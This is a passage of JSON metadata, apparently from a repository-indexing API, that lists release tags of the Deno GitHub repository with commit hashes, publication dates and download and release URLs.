nd/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos